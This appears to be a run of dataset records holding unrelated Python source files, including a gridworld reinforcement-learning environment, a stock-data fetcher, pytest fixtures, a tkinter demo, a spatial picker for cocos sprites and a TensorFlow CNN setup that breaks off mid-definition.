1)[:-1] # 0 and 360 degree is same, so removing 360\n\n lidar_signals = []\n r, c = self.agent_location\n for angle in angles_list:\n x_ratio, y_ratio = np.round(np.cos(angle), 2), np.round((np.sin(angle)), 2)\n beam_signal = np.zeros(len(self.items_id_lidar), dtype=int)#\n\n # Keep sending longer beams until hit an object or wall\n for beam_range in range(1, self.max_beam_range+1):\n r_obj = r + np.round(beam_range * x_ratio)\n c_obj = c + np.round(beam_range * y_ratio)\n obj_id_rc = self.map[int(r_obj)][int(c_obj)]\n\n # If bean hit an object or wall\n if obj_id_rc != 0:\n item = list(self.items_id.keys())[list(self.items_id.values()).index(obj_id_rc)]\n if item in self.items_id_lidar:\n obj_id_rc = self.items_id_lidar[item]\n beam_signal[obj_id_rc - 1] = beam_range\n break\n\n lidar_signals.extend(beam_signal)\n\n return lidar_signals\n\n def set_agent_facing(self, direction_str):\n\n self.agent_facing_str = direction_str\n self.agent_facing_id = self.direction_id[self.agent_facing_str]\n\n '''\n self.agent_facing_str = list(self.direction_id.keys())[list(self.direction_id.values()).index(self.agent_facing_id)]\n '''\n\n def set_items_id(self, items):\n\n items_id = {}\n for item in sorted(items):\n items_id[item] = len(items_id) + 1\n\n return items_id\n\n def get_observation(self):\n \"\"\"\n observation is lidarSignal + inventory_items_quantity\n :return: observation\n \"\"\"\n\n lidar_signals = self.get_lidarSignal()\n # observation = lidar_signals + [self.inventory_items_quantity[item] for item in\n # sorted(self.inventory_items_quantity)]\n\n # if 1 in self.items_released:\n # self.cube1_priority = 0\n # self.\n\n observation = lidar_signals + [self.current_pickup_item] + self.items_released + [self.cube1_priority, self.cube2_priority]\n\n # print(observation)\n # time.sleep(5.0)2\n return np.array(observation)\n\n def step(self, action):\n \"\"\"\n Actions: {0: 'Forward', 1: 'Left', 2: 'Right', 3: 'Break'}\n \"\"\"\n\n self.last_action = action\n r, c = self.agent_location\n\n done = False\n reward = -1 # default reward\n # Forward\n if action == 0:\n if self.agent_facing_str == 'NORTH' and self.map[r-1][c] == 0:\n self.agent_location = (r-1, c)\n # Left\n elif action == 1:\n if self.agent_facing_str == 'NORTH' and self.map[r][c-1] == 0:\n self.agent_location = (r, c-1)\n\n # Right\n elif action == 2:\n if self.agent_facing_str == 'NORTH' and self.map[r][c+1] == 0:\n self.agent_location = (r, c+1)\n\n # Backward\n elif action == 3:\n if self.agent_facing_str == 'NORTH' and self.map[r+1][c] == 0:\n self.agent_location = (r+1, c)\n\n\n # PickUp\n elif action == 4:\n self.update_block_in_front()\n # If block in front is not air and wall, place the block in front in inventory\n if self.block_in_front_str == 'cube1' or self.block_in_front_str == 'cube2':\n if self.current_pickup_state == 0:\n block_r, block_c = self.block_in_front_location\n self.map[block_r][block_c] = 0\n reward = self.reward_break\n self.current_pickup_state = 1\n if self.block_in_front_str =='cube1':\n self.current_pickup_item = 1\n elif self.block_in_front_str == 'cube2':\n self.current_pickup_item = 2\n\n # Release\n elif action == 5:\n self.update_block_in_front()\n if self.block_in_front_str == 'cube3':\n if self.current_pickup_state == 1:\n self.release_order.append(self.current_pickup_item)\n self.items_released[self.current_pickup_item-1] = self.current_pickup_item\n if len(self.release_order) > 1:\n if self.release_order == self.target_release_order:\n reward \n self.current_pickup_state = 0\n self.current_pickup_item = 0\n self.dropped_items += 1\n # flag = 0\n # reward = 0\n # for i in range(len(self.release_order)-1):\n # if self.release_order[i] < self.release_order[i + 1]:\n # flag += 1\n # else:\n # flag += 0\n # self.dropped_items += 1\n # if flag == self.dropped_items-1:\n # reward = self.reward_break\n # else:\n # reward = -20\n # self.current_pickup_state = 0\n # self.current_pickup_item = 0\n\n # Update after each step\n observation = self.get_observation()\n self.update_block_in_front()\n\n if self.goal_env == 0: # If the goal is navigation\n if not self.block_in_front_id == 0 and not self.block_in_front_str == 'wall':\n done = True\n reward = self.reward_done\n\n if self.goal_env == 1: # If the goal is pickup\n if self.current_pickup_item > 0:\n reward = self.reward_done\n done = True\n\n if self.goal_env == 2:\n if self.release_order == self.target_release_order and self.dropped_items == self.target_dropped_items:\n reward = self.reward_done\n done = True\n elif self.dropped_items == self.target_dropped_items:\n reward = -200\n done = True\n\n info = {}\n\n # Update after each step\n self.step_count += 1\n self.last_reward = reward\n self.last_done = done\n\n # if done == False and self.step_count == self.episode_timesteps:\n # done = True\n\n return observation, reward, done, info\n\n def update_block_in_front(self):\n r, c = self.agent_location\n\n\n if self.agent_facing_str == 'NORTH':\n self.block_in_front_id = self.map[r - 1][c]\n self.block_in_front_location = (r - 1, c)\n\n\n if self.block_in_front_id == 0:\n self.block_in_front_str = 'air'\n else:\n self.block_in_front_str = list(self.items_id.keys())[\n list(self.items_id.values()).index(self.block_in_front_id)]\n\n def render(self, mode='human', title=None):\n\n color_map = \"gist_ncar\"\n\n if title is None:\n title = self.env_name\n\n r, c = self.agent_location\n x2, y2 = 0, 0\n if self.agent_facing_str == 'NORTH':\n x2, y2 = 0, -0.01\n elif self.agent_facing_str == 'SOUTH':\n x2, y2 = 0, 0.01\n elif self.agent_facing_str == 'WEST':\n x2, y2 = -0.01, 0\n elif self.agent_facing_str == 'EAST':\n x2, y2 = 0.01, 0\n\n plt.figure(title, figsize=(18, 9))\n plt.imshow(self.map, cmap=color_map, vmin=0, vmax=len(self.items_id))\n # plt.imshow(self.map, cmap=color_map)\n\n plt.arrow(c, r, x2, y2, head_width=0.7, head_length=0.7, color='white')\n plt.title('NORTH', fontsize=20)\n plt.xlabel('SOUTH', fontsize=20)\n plt.ylabel('WEST', fontsize=20)\n # plt.text(self.map_width, self.map_width // 2, 'EAST', rotation=90)\n # plt.text(self.map_size, self.map_size // 2, 'EAST', rotation=90)\n # plt.colorbar()\n # plt.grid()\n\n info = '\\n'.join([\" Info: \",\n \"Env: \"+self.env_name,\n \"Steps: \" + str(self.step_count),\n \"Agent Facing: \" + self.agent_facing_str,\n \"Action: \" + self.action_str[self.last_action],\n \"Reward: \" + str(self.last_reward),\n \"Done: \" + str(self.last_done),\n \"Dropped Items: \" + str(self.dropped_items) + \"/\" + str(self.target_dropped_items)\n ])\n props = dict(boxstyle='round', facecolor='w', alpha=0.2)\n plt.text(-(self.map_width // 2) - 0.5, 2.25, info, fontsize=18, bbox=props) # x, y\n\n # plt.text(-(self.map_size // 2) - 0.5, 2.25, info, fontsize=10, bbox=props) # x, y\n\n if self.last_done:\n you_win = \"You win \"+self.env_name+\"!\"\n props = dict(boxstyle='round', facecolor='w', alpha=1)\n # plt.text(0 - 0.1, (self.map_size // 2), you_win, fontsize=18, bbox=props)\n # plt.text(0 - 0.1, (self.map_width // 2), you_win, fontsize=18, bbox=props)\n\n cmap = get_cmap(color_map)\n\n legend_elements = [Line2D([0], [0], marker=\"^\", color='w', label='agent', markerfacecolor='w', markersize=18,\n markeredgewidth=2, markeredgecolor='k'),\n Line2D([0], [0], color='w', label=\"Legend:\")]\n for item in sorted(self.items_quantity):\n rgba = cmap(self.items_id[item] / len(self.items_id))\n legend_elements.append(Line2D([0], [0], marker=\"s\", color='w',\n label=item + ': ' + str(self.items_quantity[item]),\n markerfacecolor=rgba, markersize=18))\n plt.legend(handles=legend_elements, bbox_to_anchor=(1.55, 1.02), fontsize = 18) # x, y\n\n plt.tight_layout()\n plt.pause(0.01)\n plt.clf()\n\n def close(self):\n return\n","sub_path":"gym_novel_gridworlds/envs/novel_gridworld_v0_env.py","file_name":"novel_gridworld_v0_env.py","file_ext":"py","file_size_in_byte":17616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255234267","text":"#coding:utf-8\nfrom AMSS.utils.requestor import Requestor\nfrom AMSS.conf.urls import dfcf_headers, url_block, url_bk_kline, url_stocks_block\nimport pandas as pd\nfrom AMSS.utils.timer import get_ts_ms\n\n\nclass Receiver(object):\n def __init__(self, source='dfcf'):\n self.source = source\n\n def get_blocks(self, block_type='gn_block'):\n \"\"\"\n :param block_type:\n :return:\n \"\"\"\n if self.source == 'dfcf':\n url = url_block.format(block_type[0:2].upper())\n r = Requestor(url, headers=dfcf_headers, reg=r'(\\[.*?\\])')\n blocks = r.my_req()\n bk_list = []\n for bk in blocks:\n tmp = bk.split(',')\n bk_tuple = (tmp[1], tmp[2])\n bk_list.append(bk_tuple)\n print(bk_list)\n blocks_df = pd.DataFrame(bk_list, columns=['block_id', 'name'])\n # blocks_df['name'] = blocks_df['name'].to_string\n blocks_df = blocks_df.set_index(['block_id'])\n return blocks_df\n\n\n def get_block_index(self, bk_id, ktype='K'):\n ts = get_ts_ms()\n url = url_bk_kline.format(bk_id, ktype, ts, ts, ts)\n r = Requestor(url, headers=dfcf_headers, reg=r'\\((.*?)\\)')\n index_k = r.my_req()['data']\n # print(index_k)\n data = []\n for day in index_k:\n row_list = day.split(',')\n data.append(row_list)\n index_df = pd.DataFrame(data, columns=('time', 'open', 'close', 'high', 'low', 'vol', 'amount', 'span'))\n index_df['block_id'] = bk_id\n return index_df\n\n def get_stocks(bk_id):\n url = url_stocks_block.format(bk_id)\n r = Requestor(url, headers=dfcf_headers, reg=r'(\\[.*?\\])')\n stocks = r.my_req()\n data = []\n for s in stocks:\n code = s.split(',')[1]\n data.append((bk_id, code))\n df_stock = pd.DataFrame(data, columns=('block_id', 'code'))\n return df_stock\n\n\n\nif __name__ == '__main__':\n # print get_blocks()\n pass\n # for i in get_blocks().index:\n # print(get_stocks(i))\n\n","sub_path":"Automaticic_monitoring_system_for_stocks/AMSS/data/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206703559","text":"import pytest\nfrom aiohttp.test_utils import TestClient\n\nfrom tests import models\nfrom tests.pg_sa.app import get_app\nfrom tests.pg_sa.utils import async_engine_connection\n\n\n@pytest.fixture\nasync def user(loop):\n async with async_engine_connection() as conn:\n query = models.users.select().limit(1)\n return await conn.fetch_one(query)\n\n\n@pytest.fixture\nasync def get_last_created_user(loop):\n async def _get_last_user():\n async with async_engine_connection() as conn:\n query = models.users.select().order_by(models.users.c.created_at.desc()).limit(1)\n return await conn.fetch_one(query)\n\n return _get_last_user\n\n\n@pytest.fixture\nasync def get_user_by_id(loop):\n async def _get_user_by_id(user_id):\n async with async_engine_connection() as conn:\n query = models.users.select(models.users.c.id == user_id)\n return await conn.fetch_one(query)\n\n return _get_user_by_id\n\n\n@pytest.fixture\nasync def client(aiohttp_client):\n client: TestClient = await aiohttp_client(get_app())\n return client\n\n\n@pytest.fixture\nasync def pg_sa_instance(loop):\n async with async_engine_connection() as conn:\n query = models.pg_sa_fields.select().limit(1)\n return await conn.fetch_one(query)\n\n\ndef pytest_runtest_setup(item):\n if \"with_client\" in item.keywords and \"client\" not in item.fixturenames:\n # inject client\n item.fixturenames.append(\"client\")\n","sub_path":"tests/pg_sa/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"114517193","text":"import cea\nimport cea.GUI\nimport cea.GUI.toolbox\n\n__author__ = \"Daren Thomas\"\n__copyright__ = \"Copyright 2016, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Daren Thomas\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"thomas@arch.ethz.ch\"\n__status__ = \"Production\"\n\nreload(cea)\nreload(cea.GUI)\nreload(cea.GUI.toolbox)\n\nDemandTool = cea.GUI.toolbox.DemandTool\nPropertiesTool = cea.GUI.toolbox.PropertiesTool\nEmissionsTool = cea.GUI.toolbox.EmissionsTool\nEmbodiedEnergyTool = cea.GUI.toolbox.EmbodiedEnergyTool\nHeatmapsTool = cea.GUI.toolbox.HeatmapsTool\nGraphsDemandTool = cea.GUI.toolbox.GraphsDemandTool\nRadiationTool = cea.GUI.toolbox.RadiationTool\nScenarioPlotsTool = cea.GUI.toolbox.ScenarioPlotsTool\nGraphsBenchmarkTool = cea.GUI.toolbox.GraphsBenchmarkTool\nMobilityTool = cea.GUI.toolbox.MobilityTool\n\nclass Toolbox(object):\n def __init__(self):\n self.label = 'City Energy Analyst'\n self.alias = 'cea'\n self.tools = [PropertiesTool, DemandTool, EmissionsTool, EmbodiedEnergyTool, HeatmapsTool, GraphsDemandTool,\n RadiationTool, ScenarioPlotsTool, GraphsBenchmarkTool, MobilityTool]\n","sub_path":"City Energy Analyst.pyt","file_name":"City Energy Analyst.pyt","file_ext":"pyt","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"514180334","text":"import h5py\nimport unittest\nimport numpy as np\n\nfrom QGL import *\nfrom instruments.drivers import APSPattern\n\nclass APSPatternUtils(unittest.TestCase):\n def setUp(self):\n # self.q1gate = Channels.LogicalMarkerChannel(label='q1-gate')\n # self.q1 = Qubit(label='q1', gateChan=self.q1gate)\n self.q1 = Qubit(label='q1')\n self.q1.pulseParams['length'] = 30e-9\n\n Compiler.channelLib = {'q1': self.q1}\n\n def test_unroll_loops_simple(self):\n q1 = self.q1\n seqs = [repeat(2, [qwait(), X(q1), Id(q1)]), repeat(2, [qwait(), Y(q1), Id(q1)])]\n a, b = APSPattern.unroll_loops(seqs)\n assert(a == seqs)\n assert(b == 2)\n\n def test_unroll_loops(self):\n q1 = self.q1\n seqs = [repeat(2, [qwait(), X(q1), Id(q1)]), repeat(3, [qwait(), Y(q1), Id(q1)])]\n a, b = APSPattern.unroll_loops(seqs)\n\n seqUnrolled = [qwait(), X(q1), Id(q1)]*2\n assert(a[0] == seqUnrolled)\n\n seqUnrolled = [qwait(), Y(q1), Id(q1)]*3\n assert(a[1] == seqUnrolled)\n\n assert(b == 0)\n\n def test_unroll_nested_loops(self):\n q1 = self.q1\n seqs = [repeat(2, [X(q1),Y(q1)] + repeat(3, [Z(q1)]) + [Y(q1),X(q1)]), [X(q1), Y(q1)]]\n a, b = APSPattern.unroll_loops(seqs)\n\n loopedZ = Z(q1)\n loopedZ.repeat = 3\n seqUnrolled = ([X(q1),Y(q1), loopedZ, Y(q1),X(q1)])*2\n\n assert(a[0] == seqUnrolled)\n\n assert(b == 0)\n\n def test_unroll_single_entry(self):\n q1 = self.q1\n seqs = [repeat(5, [X(q1)]) + [Y(q1)]]\n a, b = APSPattern.unroll_loops(seqs)\n seqUnrolled = [X(q1), Y(q1)]\n seqUnrolled[0].repeat = 5\n\n assert(a[0] == seqUnrolled)\n assert(b == 0)\n\nif __name__ == \"__main__\": \n unittest.main()\n","sub_path":"tests/test_APSPattern.py","file_name":"test_APSPattern.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"180949878","text":"__author__ = 'huergasi'\n\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nimport theano as t\n\ndef parsefile(filename, targetoffset):\n indices = [1,2,3,4,6,7,8,9,11,12,13,14]\n volume_index = [16]\n original_data = getoriginaldata(filename)\n file = open(filename, 'r')\n start = 0\n previous = []\n x=[]\n y=[]\n i = 0\n for line in file:\n row = np.array(line.split(','))\n current = np.take(row, indices).astype(np.float32)\n if start == 0:\n previous = np.take(row, indices).astype(np.float32)\n previous_volume = np.take(row, volume_index).astype(np.float32)\n start+=1\n else:\n current_volume = np.take(row, volume_index).astype(np.float32)\n sample = np.empty((1,current.size + 1))\n for index in np.arange(current.size):\n sample[0][index] = ((current[index] - previous[index]) / previous[index]) * 100\n sample[0][current.size] = current_volume\n previous = current\n if i < (original_data.size / 13) - targetoffset:\n x .append(sample)\n current_y = ((original_data[(i + targetoffset)*13] - current[0]) / current[0]) * 100\n y.append(current_y)\n i+=1\n return np.array(x),np.array(y)\n\ndef parse_and_normalize_file(filename, targetoffset, mu, sigma, y_max, y_min):\n indices = [1,2,3,4,6,7,8,9,11,12,13,14]\n volume_index = [16]\n original_data = getoriginaldata(filename)\n file = open(filename, 'r')\n start = 0\n previous = []\n x= np.empty([1,13], dtype=np.float32)\n y= np.empty([1], dtype=np.float32)\n i = 0\n for line in file:\n row = np.array(line.split(','))\n current = np.take(row, indices).astype(np.float32)\n if start == 0:\n previous = np.take(row, indices).astype(np.float32)\n previous_volume = np.take(row, volume_index).astype(np.float32)\n start+=1\n else:\n current_volume = np.take(row, volume_index).astype(np.float32)\n sample = np.empty((1,current.size + 1))\n for index in np.arange(current.size):\n sample[0][index] = ((current[index] - previous[index]) / previous[index]) * 100\n sample[0][current.size] = current_volume\n previous = current\n if i < (original_data.size / 13) - targetoffset:\n sample = ((sample - mu )/ sigma).astype(np.float32)\n x = np.vstack((x, sample))\n current_y = (((original_data[(i + targetoffset)*13] - current[0]) / current[0]) * 100).astype(np.float32)\n current_y = ((2 * (current_y - y_min) / (y_max-y_min)) - 1).astype(np.float32)\n y = np.vstack((y,current_y))\n i+=1\n x = np.delete(x, 0, 0)\n y = np.delete(y, 0, 0)\n return x, y\n\n\ndef get_mu_sigma_y(filepath, targetoffset):\n files = [f for f in listdir(filepath) if isfile(join(filepath, f))]\n alldata = []\n ally=[]\n mu = np.zeros((13,), dtype=np.float32)\n sigma = np.zeros((13,), dtype=np.float32)\n y_max = 0\n y_min = 0\n for f in files:\n x,y = (parsefile(join(filepath, f),targetoffset))\n alldata.append(x)\n ally.append(y)\n\n alldata_matrix = alldata[0]\n ally_matrix = ally[0]\n\n start = 0\n for el in alldata:\n if start !=0:\n alldata_matrix=np.vstack((alldata_matrix, el))\n else:\n start+=1\n\n start = 0\n for ey in ally:\n if start !=0:\n ally_matrix=np.hstack((ally_matrix, ey))\n else:\n start+=1\n\n alldata_matrix=np.matrix(alldata_matrix)\n mu = alldata_matrix.mean(0)\n sigma = alldata_matrix.std(0)\n y_max = ally_matrix.max()\n y_min = ally_matrix.min()\n\n return mu, sigma, y_max, y_min\n\ndef getoriginaldata(filename):\n indices = [1,2,3,4,6,7,8,9,11,12,13,14,16]\n file = open(filename, 'r')\n data = []\n start = 0\n for line in file:\n if start>0:\n row = np.array(line.split(','))\n data = np.append(data, np.take(row, indices).astype(np.float))\n start+=1\n return data\n\ndef getdata():\n path_training=r\"C:\\Users\\huergasi\\MLCode\\myCode\\data\\ib\\30sec\\training_sample\"\n path_testing=r\"C:\\Users\\huergasi\\MLCode\\myCode\\data\\ib\\30sec\\testing_sample\"\n path_validation=r\"C:\\Users\\huergasi\\MLCode\\myCode\\data\\ib\\30sec\\validation_sample\"\n\n training_files= [f for f in listdir(path_training) if isfile(join(path_training, f))]\n testing_files= [f for f in listdir(path_testing) if isfile(join(path_testing, f))]\n validation_files=[f for f in listdir(path_validation) if isfile(join(path_validation, f))]\n\n training_data_x = []\n training_data_y = []\n\n testing_data_x = []\n testing_data_y = []\n\n validation_data_x = []\n validation_data_y = []\n\n targetoffset = 4\n\n mu, sigma, y_max, y_min = get_mu_sigma_y(path_training, targetoffset)\n\n for f in training_files:\n x_train,y_train = parse_and_normalize_file(join(path_training, f),targetoffset, mu, sigma, y_max, y_min)\n training_data_x.append(x_train)\n training_data_y.append(y_train)\n\n for ftest in testing_files:\n x_test,y_test = parse_and_normalize_file(join(path_testing, ftest),targetoffset, mu, sigma, y_max, y_min)\n testing_data_x.append(x_test)\n testing_data_y.append(y_test)\n\n for fval in validation_files:\n x_val,y_val = parse_and_normalize_file(join(path_validation, fval),targetoffset, mu, sigma, y_max, y_min)\n validation_data_x.append(x_val)\n validation_data_y.append(y_val)\n\n return (training_data_x, training_data_y), (validation_data_x, validation_data_y), (testing_data_x, testing_data_y)\n\n\n\n\n\n","sub_path":"scripts/preprocessData.py","file_name":"preprocessData.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"18834983","text":"import math\nfrom bisect import bisect, insort\nfrom cocos.batch import BatchNode\n\nfrom cocos.euclid import Vector2, Matrix3\n\nclass Picker(object):\n \"\"\" A picker to find your children quickly \"\"\"\n def __init__(self):\n self.xChildren = {}\n self.yChildren = {}\n self.xs = []\n self.ys = []\n\n def _insert1d (self, child, ps, pChildren, p1, p2):\n p1pos = bisect(ps, p1)\n if p1pos == 0:\n ps.insert(0, p1)\n pChildren[p1] = set()\n elif ps[p1pos - 1] != p1:\n ps.insert(p1pos, p1)\n pChildren[p1] = pChildren[ps[p1pos - 1]].copy()\n else:\n p1pos -= 1\n p2pos = bisect(ps, p2)\n if ps[p2pos - 1] != p2:\n ps.insert(p2pos, p2)\n pChildren[p2] = pChildren[ps[p2pos - 1]].copy()\n else:\n p2pos -= 1\n for i in range(p1pos, p2pos):\n pChildren[ps[i]].add(child)\n\n def insert(self, child, x1, y1, x2, y2):\n \"\"\" Add a child \"\"\"\n self._insert1d(child, self.xs, self.xChildren, x1, x2)\n self._insert1d(child, self.ys, self.yChildren, y1, y2)\n\n def childrenAt(self, x, y):\n xPos = bisect(self.xs, x)\n if xPos == 0: return set()\n yPos = bisect(self.ys, y)\n if yPos == 0: return set()\n\n canditates = self.xChildren[self.xs[xPos-1]].intersection(self.yChildren[self.ys[yPos-1]])\n return [child for child in canditates if self._point_inside_child(x, y, child)]\n\n def _point_inside_child(self, x, y, child):\n \"\"\"\n \"\"\"\n # import pdb; pdb.set_trace()\n point = Vector2(x, y)\n cpos = Vector2(child.x, child.y)\n\n angle = math.radians(child.rotation)\n local_point = (Matrix3.new_rotate(angle) * (point - cpos)) * child.scale\n half_w, half_h = (child.width / 2) * child.scale, (child.height / 2) * child.scale\n\n if abs(local_point.x) < half_w and abs(local_point.y) < half_h:\n return True\n else:\n return False\n\n\n def _delete1d(self, child, ps, pChildren, p1, p2):\n p1Pos = bisect(ps, p1) - 1\n p2Pos = bisect(ps, p2) - 1\n for i in range(p1Pos, p2Pos):\n pChildren[ps[i]].remove(child)\n if pChildren[ps[p1Pos]] == pChildren[ps[p1Pos - 1]]:\n del pChildren[ps[p1Pos]]\n ps.pop(p1Pos)\n p2Pos -=1\n if pChildren[ps[p2Pos]] == pChildren[ps[p2Pos - 1]]:\n del pChildren[ps[p2Pos]]\n ps.pop(p2Pos)\n\n def delete(self, child, x1, y1, x2, y2):\n \"\"\" Delete all occurrences of child between x1, y1, x2, y1 \"\"\"\n self._delete1d(child, self.xs, self.xChildren, x1, x2)\n self._delete1d(child, self.ys, self.yChildren, y1, y2)\n\nfrom cocos.euclid import Matrix3, Vector2\nclass NodePicker(Picker):\n \"\"\" Wrap a CocosNode, and keep its children in a Picker \"\"\"\n def __init__(self):\n self.children = {}\n super(NodePicker, self).__init__()\n\n def hotspot(self, child):\n x = - child.image_anchor_x * child.scale\n y = - child.image_anchor_y * child.scale\n m = Matrix3.new_rotate(child.rotation)\n p1 = m * Vector2(x, y)\n p2 = m * Vector2(x + child.width, y)\n p3 = m * Vector2(x, y + child.height)\n p4 = m * Vector2(x + child.width, y + child.height)\n x1 = min(p1.x, p2.x, p3.x, p4.x)\n y1 = min(p1.y, p2.y, p3.y, p4.y)\n x2 = max(p1.x, p2.x, p3.x, p4.x)\n y2 = max(p1.y, p2.y, p3.y, p4.y)\n return int(child.x + x1), int(child.y + y1), int(child.x + x2), int(child.y + y2)\n\n def add(self, child):\n self.children[child] = self.hotspot(child)\n self.insert(child, *self.children[child])\n\n def remove(self, child):\n self.delete(child, *self.children[child])\n\n def update(self, child):\n self.remove(child)\n self.add(child)\n\nclass PickerBatchNode(BatchNode):\n\n def __init__(self):\n self.picker = NodePicker()\n super(PickerBatchNode, self).__init__()\n\n def add(self, child, z=0, name=None):\n child.register(self, 'x')\n child.register(self, 'y')\n child.register(self, 'position')\n child.register(self, 'rotation')\n child.register(self, 'scale')\n self.picker.add(child)\n super(PickerBatchNode, self).add(child, z, name)\n\n def remove(self, child):\n child.unregister(self, 'x')\n child.unregister(self, 'y')\n child.unregister(self, 'position')\n child.unregister(self, 'rotation')\n child.unregister(self, 'scale')\n self.picker.remove(child)\n super(PickerBatchNode, self).remove(child)\n\n def on_notify(self, node, attribute):\n self.picker.update(node)\n\n def childrenAt(self, x, y):\n return self.picker.childrenAt(x, y)\n\nif __name__ == '__main__':\n import unittest\n class TestPicker(unittest.TestCase):\n def testPicker(self):\n t = Picker()\n t.insert(\"A\", 1, 2, 3, 4)\n t.insert(\"B\", 2, 3, 4, 5)\n t.insert(\"C\", 3, 4, 5, 6)\n t.insert(\"D\", 1, 1, 6, 6)\n self.assertEquals(set([\"A\", \"D\"]), t.childrenAt(2.5, 2.5))\n t.delete(\"D\", 1, 1, 6, 6)\n self.assertEquals(set([\"A\"]), t.childrenAt(2.5, 2.5))\n t.delete(\"B\", 2, 3, 4, 5)\n t.insert(\"B\", 1, 1, 3, 3)\n self.assertEquals(set([\"A\", \"B\"]), t.childrenAt(2.5, 2.5))\n\n unittest.main()\n\n","sub_path":"gamelib/tiless_editor/picker.py","file_name":"picker.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"1768066","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass Aplicacion:\n def __init__(self):\n #Formulario/ventana\n self.ventana1=tk.Tk()\n \n #Etiqueta/label\n self.label1=tk.Label(self.ventana1, text=\"Hola y saludos: \")\n self.label1.grid(column=0, row=0)\n\n #Caja_texto/entry\n self.entry1=tk.Entry(self.ventana1, width=10)\n self.entry1.grid(column=0, row=1)\n\n #RadioButton\n self.radio1=tk.Radiobutton(self.ventana1,text=\"Selection\")\n self.radio1.grid(column=0, row=2)\n\n #Checkbutton\n self.check1=tk.Checkbutton(self.ventana1, text=\"Python\")\n self.check1.grid(column=0, row=3)\n\n #Listbox\n self.list1=tk.Listbox(self.ventana1)\n self.list1.grid(column=0, row=4)\n self.list1.insert(0,\"galletas\")\n self.list1.insert(1,\"pan\")\n\n #Combobox\n dias=(\"Lunes\", \"Martes\", \"Miercoles\")\n self.combobox1=ttk.Combobox(self.ventana1, width=10, values=dias)\n self.combobox1.current(0)\n self.combobox1.grid(column=0, row=5)\n\n #Menubar\n menubar1=tk.Menu(self.ventana1)\n self.ventana1.config(menu=menubar1)\n opciones1=tk.Menu(menubar1)\n opciones1.add_command(label=\"Abrir\")\n opciones1.add_command(label=\"Guardar\")\n opciones1.add_command(label=\"Salir\")\n menubar1.add_cascade(label=\"Archivo\", menu=opciones1)\n\n\n\n self.ventana1.mainloop()\n\naplicacion1=Aplicacion()","sub_path":"Evidencia 84_VSCode_tk_controles.py","file_name":"Evidencia 84_VSCode_tk_controles.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"517476162","text":"# coding=utf-8\n# Copyright 2018 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for resource module.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow_datasets.core.download import resource\n\nNO_EXTRACT = resource.ExtractMethod.NO_EXTRACT\nTAR = resource.ExtractMethod.TAR\nTAR_GZ = resource.ExtractMethod.TAR_GZ\nGZIP = resource.ExtractMethod.GZIP\nZIP = resource.ExtractMethod.ZIP\n\n\nclass GuessExtractMethodTest(tf.test.TestCase):\n\n def test_(self):\n for fname, expected_result in [\n ('bar.tar.gz', TAR_GZ),\n ('bar.gz', GZIP),\n ('bar.tar.zip', ZIP),\n ('bar.gz.strange', NO_EXTRACT),\n ('bar.tar', TAR),\n ]:\n res = resource._guess_extract_method(fname)\n self.assertEqual(res, expected_result, '(%s)->%s instead of %s' % (\n fname, res, expected_result))\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"tensorflow_datasets/core/download/resource_test.py","file_name":"resource_test.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"403861723","text":"import tensorflow as tf\nimport numpy as np\nimport random\nimport tensorflow.contrib.layers as layers\nfrom tensorflow.contrib import rnn\nfrom tqdm import tqdm\n\n\n\nclass Settings(object):\n def __init__(self):\n self.vocab_size = 114042\n self.len_sentence = 70\n self.num_epochs = 3 # 在一个num_epochs中,所有训练集数据使用一次\n self.num_classes = 53\n self.cnn_size = 230\n self.num_layers = 1\n self.pos_size = 5\n self.pos_num = 123\n self.word_embedding = 50\n self.keep_prob = 0.5\n self.batch_size = 300 # 每个批次的大小\n self.num_steps = 10000\n self.lr = 0.001\n\n\nclass CNN():\n\n def __init__(self, word_embeddings, setting):\n\n self.vocab_size = setting.vocab_size\n self.len_sentence = len_sentence = setting.len_sentence\n self.num_epochs = setting.num_epochs\n self.num_classes = num_classes = setting.num_classes\n self.cnn_size = setting.cnn_size\n self.num_layers = setting.num_layers\n self.pos_size = setting.pos_size\n self.pos_num = setting.pos_num\n self.word_embedding = setting.word_embedding\n self.lr = setting.lr\n\n\n # 使用这些参数获取现有变量或创建一个新变量。\n # 定义tf中用到的变量\n word_embedding = tf.get_variable(initializer=word_embeddings, name='word_embedding')\n pos1_embedding = tf.get_variable('pos1_embedding', [self.pos_num, self.pos_size])\n pos2_embedding = tf.get_variable('pos2_embedding', [self.pos_num, self.pos_size])\n # 